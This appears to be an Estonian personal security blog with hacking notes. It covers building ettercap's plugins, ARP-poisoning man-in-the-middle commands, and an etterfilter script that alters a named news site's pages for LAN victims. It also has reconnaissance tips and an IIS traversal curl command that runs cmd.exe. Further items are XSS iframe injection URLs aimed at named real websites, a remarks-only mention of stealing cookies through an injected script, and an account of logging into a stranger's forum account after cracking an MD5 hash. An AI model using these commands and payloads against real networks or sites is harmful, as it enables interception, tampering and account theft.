ettercap

Pluginad

[Thu Nov 04 23:05:58 margusja@IRack ettercap -P list

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Available plugins :

No plugin found !

[Thu Nov 04 23:07:01 margusja@IRack

Not good ūüôĀ

Parandame selle vea:

[Thu Nov 04 23:21:59 margusja@IRack sudo port install libtool
Warning: port definitions are more than two weeks old, consider using selfupdate
---> Computing dependencies for libtool
---> Fetching libtool
---> Attempting to fetch libtool-2.4.tar.gz from ftp://ftp.funet.fi/pub/gnu/prep/libtool
---> Verifying checksum(s) for libtool
---> Extracting libtool
---> Configuring libtool
---> Building libtool
---> Staging libtool into destroot
---> Installing libtool @2.4_0
---> Deactivating libtool @2.2.8_0+darwin
---> Activating libtool @2.4_0
---> Cleaning libtool
[Thu Nov 04 23:22:42 margusja@IRack

By default lastakse mac os x port all ettercap-ng kokku –disable-plugins v√Ķtmega. Siinkohal tuleks teha midagi sellist:

# sudo port
[turva/webserver] > edit ettercap-ng
configure.args --disable-gtk \
--with-openssl=${prefix} \
--disable-plugins \ <-- SEE RIDA KUSTUTADA --with-libpcap=${prefix} \ --with-libnet=${prefix} \ --with-libpcre=${prefix} \ --mandir=\\\${prefix}/share/man \ --infodir=\\\${prefix}/share/info

N√ľ√ľd uuesti configure ja install.

Tulemus:

[Fri Nov 05 19:17:57 margusja@IRack sudo /opt/local/bin/ettercap -P list

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Available plugins :

arp_cop 1.1 Report suspicious ARP activity
autoadd 1.2 Automatically add new victims in the target range
chk_poison 1.1 Check if the poisoning had success
dns_spoof 1.1 Sends spoofed dns replies
dos_attack 1.0 Run a d.o.s. attack against an IP address
dummy 3.0 A plugin template (for developers)
find_conn 1.0 Search connections on a switched LAN
find_ettercap 2.0 Try to find ettercap activity
find_ip 1.0 Search an unused IP address in the subnet
finger 1.6 Fingerprint a remote host
finger_submit 1.0 Submit a fingerprint to ettercap's website
gre_relay 1.0 Tunnel broker for redirected GRE tunnels
gw_discover 1.0 Try to find the LAN gateway
isolate 1.0 Isolate an host from the lan
link_type 1.0 Check the link type (hub/switch)
pptp_chapms1 1.0 PPTP: Forces chapms-v1 from chapms-v2
pptp_clear 1.0 PPTP: Tries to force cleartext tunnel
pptp_pap 1.0 PPTP: Forces PAP authentication
pptp_reneg 1.0 PPTP: Forces tunnel re-negotiation
rand_flood 1.0 Flood the LAN with random MAC addresses
remote_browser 1.2 Sends visited URLs to the browser
reply_arp 1.0 Simple arp responder
repoison_arp 1.0 Repoison after broadcast ARP
scan_poisoner 1.0 Actively search other poisoners
search_promisc 1.2 Search promisc NICs in the LAN
smb_clear 1.0 Tries to force SMB cleartext auth
smb_down 1.0 Tries to force SMB to not use NTLM2 key auth
stp_mangler 1.0 Become root of a switches spanning tree

Sessioon 2010

Samal ajal tcpdump-ga faili

Siit edasi juba saab lugeda wireshark-i

Ettercap and wireshark

Ettercap http://ettercap.sourceforge.net/) on √ľks mega-power-tool ja niisama ajaviitmise riist ka. Siinkohal hakkan seda ise natuke lahkama ja panen siia siis kirja kuidas l√§heb. Aeg on n√§idanud et kui mingi asjaga ikka pidevalt ei tegele siis l√§hed rooste. Samas kui on kusagilt v√§ga lihtsad n√§ited v√Ķtta siis v√Ķib ka roostes ollas tuusa mulje j√§tta :)

* ettercap -P list - peaks andma kasutatavate pluginate listi

*¬†ettercap -Tq -i [interface]-M arp:remote // - kogu LAN. Suurema kohtv√Ķrgu puhul ei pruugi teie v√Ķrgukaart piisav olla. Kui soovi kindel grupp koosatada siis saab seda¬†m√§√§rata /192.168.0.1(gw),100(victim1)/ - antud juhul olete 192.168.0.1 ja 192.168.0.100 liikluse vahel.

V√Ķtame siis esimese ja k√Ķige karmima case. LAN peal MITMA (Man In The Middle Attac)
Enne kui ilmusid switchid oli asi lihtne. K√Ķike pakette karjuti terve v√Ķrgu peale. N√ľ√ľd larjutakse kogu v√Ķrgule v√§he, kuid siiski. √úks neist on ARP p√§ringud. Kuna ARP toimib LAN peal siis ei peeta seda kuigi ohtlikuks. KUID!!! Tuleb teie kontorise klient ja soovib oma s√ľlearvuti panna teie sisev√Ķrku ja kogub umbes 1h jooksul k√Ķik liikluse oma arvutisse. Hiljem siis kodus anal√ľ√ľsib seda ja... edasi te ei taha teada.
Kuidas ta seda siis teeb.
LINUX: echo 1 > /proc/sys/net/ipv4/ip_forward BSD: sysctl -w net.inet.ip.forwarding=1

- Seda selleks et liiklus arvutisse pidama ei jääks.
ettercap -o -T -P repoison_arp -M arp:remote /VIGTIM IP/ /GW IP/

Mis iganes on vahepeal arenenud (29.05.2008) aga MAX OS X 10.5 ja port pealt kokku lastud ettercap pelab siin: ettercap -a -i en(n) victimIP GW-IP. K√Ķrvale wireshark k√§ima ja oled kohe terve LAN-i hirm ja kunn.

Mis siis toimub. LAN peal on switchides ja arvutites ARP tabelid kus on kirjas IP aadress ja MAC aadress. Kui n√ľ√ľd mingi paket LAN peal liigub siis paketi sees on src IP ja target IP masinad siis v√Ķrdlevad ARP tablelitest kuhu MACi peale seda saata. Kuna aga ARPi v√Ķivad LAN peal saata k√Ķik siis v√Ķib h√§kker karjuda LAN peale et tema mac on GW mac. Sellest piisab et kogu liiklus v√Ķi siis vastava arvuti liiklus k√§ib l√§bi h√§kkeri arvuti.
---

etterfilter¬†-¬†P√§ris¬†p√Ķnev¬†m√§nguasi¬†millega¬†saad¬†m√Ķjutada¬†enda¬†k√§es¬†olevat¬†liiklust.

V√Ķtame¬†lehe¬†www.delfi.ee

avame tekstieditori ja kirjutame sinna:

#¬†Kuna¬†veebiserverid¬†saadavad¬†vastuseid¬†pakitult¬†ja¬†meie¬†ei¬†soovi¬†seda siis lihtsalt saadame serverile suvalise encodingu, peaasi et sama pika. N√ľ√ľd peaksime vastu puhast teksit saama

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}

# antud osa on juba iga√ľhe enda teha. Siin lihtsalt n√§ide.
if (ip.proto == TCP && tcp.src == 80) {
replace("Loe", "Jipikajee mader fakker");
msg("Filter Ran.\n");
}

Kompileerime:

etterfilter delfi.filter -o delfi.ef

ja¬†k√§ivitame¬†r√ľnnaku:

ettercap -i en1 -T -q -F delfi.ef -M ARP // v√Ķi /192.168.0.1(gw),100(victim 192.168.0.100)

Kui¬†n√ľ√ľd¬†k√Ķik¬†kenasti¬†laabus,¬†seal¬†on¬†veel¬†omad¬†nipid¬†ja¬†n√Ķksud,¬†vahel¬†peab¬†root¬†kasutaja¬†alt¬†tegema¬†v√Ķi¬†siis¬†vajalikes¬†kohas¬†vajalikud¬†√Ķigused,¬†igatahes¬†kui¬†n√ľ√ľd¬†sama¬†LAN-i¬†peale¬†keegi¬†www.delfi.ee¬†peale¬†satub¬†siis¬†v√Ķib¬†ta¬†seal¬†Loe¬†asemel¬†suht¬†naljakat¬†asja¬†kohata.

See¬†oli¬†lihtsalt¬†n√§ide.¬†Antud¬†l√Ķik¬†ei¬†kutsu¬†kuidagi¬†delfi.ee¬†maha¬†tegema¬†vaid¬†oli¬†suvaline¬†n√§ide.

Kui sina v√Ķid seda teha siis v√Ķib seda √ľksk√Ķik kes. Seega kontrolli¬†kas v√Ķrk on puhas¬†sinusugustest.

* ettercap -c -N

* ettercap -l -N annab hea √ľlevaate v√Ķrgus asuvate¬†masinate IP-de ja MAC aadressidest.

HOH

  • http://retrogod.altervista.org/GHDB.TXT

Info saamine on v√§ga oluline. Kui me r√§√§gime domeenidest siis mitte k√§sureal ennast v√§ga mugavatele inimestele siin paar abiks saiti. Teine hea omdus on neil ehk ka see, et te ei pea “testimise” ajal leidma mingit proxyt mis on teadagi suht aeglane.Internet Assigned Number Autority – http://www.iana.com Siin saab root domeenide kohta infot. N√§iteks .ee domeen¬†http://www.iana.com/root-whois/ee.htm

www.dnsstuff.com – Erinevaid web based toole DNS kirjete jaoks.
http://www.ip-plus.net/tools/tools.en.html Р siin saab vabalt axfr NS päringuid teha ilma et ise silma paistaks.
host -t axfr gov.uk [ns server] annab antud domeeni all asuvad saidid.

whois on power tool. Tasub silmas pidada et whois NIMI ja whois IP annavad totaalselt erinevad tulemused. N√§iteks aadressiruumi saab just whois IP j√§rgi inetnum kirje sees. See vahemik scanneriga v√Ķib anda p√§ris huvitavaid tulemusi.
http://sec.angrypacket.com/code/blindcrawl.pl – hea script hostide nimede testimiseks.

NSTX ja IODINE ip over DNS Рpäris abix tasuta interneti loomiseks.

Cryptitud admed n√§iteks paroolifailid – V√§ike test. Teisendame seks md5 kujule (md5 online v√Ķi teie oma md5 func) ja saame 1af946f0cd9c9568b26a40a705c3df7c see tulemus omakorda googlesse ja esimene tulemus on:SeniorSite v.1.4.1[SSUser]: loaded user (login: petermc, pass: 1af946f0cd9c9568b26a40a705c3df7c, id: 809, auth: , fullname: Peter MC, email: petermc@skizoklan.dkactivated: …
Siinkohal ei hakka urli mina tooma aga urlile minnes paistis sealt mingi foorum kuhu sai kenasti sisse petermc ja seks. Mis point on? Isegi cryptitud andmeid ei tohiks lohakalt hoida.

www.netcraft.com – veebiserveri kohta korralikult infot.nmap -sV V√Ķti on oluline, sest siis n√§eb reaalseid teenuseid mis portides jooksevad.

openssl-too-open http://www.phreedom.org/solar/exploits/apache-openssl/


http://www.zone-h.org/ – P√§ris hea online list maha v√Ķetud saitidest ja kuidas v√Ķeti.
www.proxy4free.com – avalikud proxy (high anonymity)

rootkit –
port knocking
www.mikx.de – dude otsib brauserite auke.
kmod ptrace

..%255c..\\winnt\\system32\\cmd.exe?/c%20dir

curl “http://192.168.10.149/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255c\\winnt\\system32\\cmd.exe?/c%20type%20\\Inetpub\\Flightlist\\Flightlist.txt”

IISI peal failinime l6ppu +.htr

ettercap fun filter

paroolide cryptimine john paroolifail √Ķigel kujul ette.

Huvitavaid tulemusi saab googlest erinevaid failityype otsides n√§iteks inc paljud progejad incluudivad sedatyypi faile. samas neid otse k√ľsides veebiserver annab source koodi.

Protected: Nuu nuu!

This content is password protected. To view it please enter your password below:

XXS funn and Cookies stealing

http://www.skydive.ee/?op=search&sw=%3Ciframe%20src=http://www.hot.ee/kalamaja1991/skydive.html%20width=1000%20height=1000%3E ja link

http://www.usk.ee/links.php?search=%3Ciframe+src%3Dhttp://ftp.margusja.pri.ee/GAY.JPG%20width=500%20height=500%3E&andor=and&submit=Otsi ja link

Oletame, et te leiate koha kus saab n.n HTML-i injectida, Otsinguformid, html-i lubavad foorumid, kommentaarimise formid jne…
Lisate sinna rea javascriptis mis kutsub välja http://ftp.margusja.pri.ee/s.jc. Tulemust näete siin


 

Keskerakonna Haabersti leht <Link>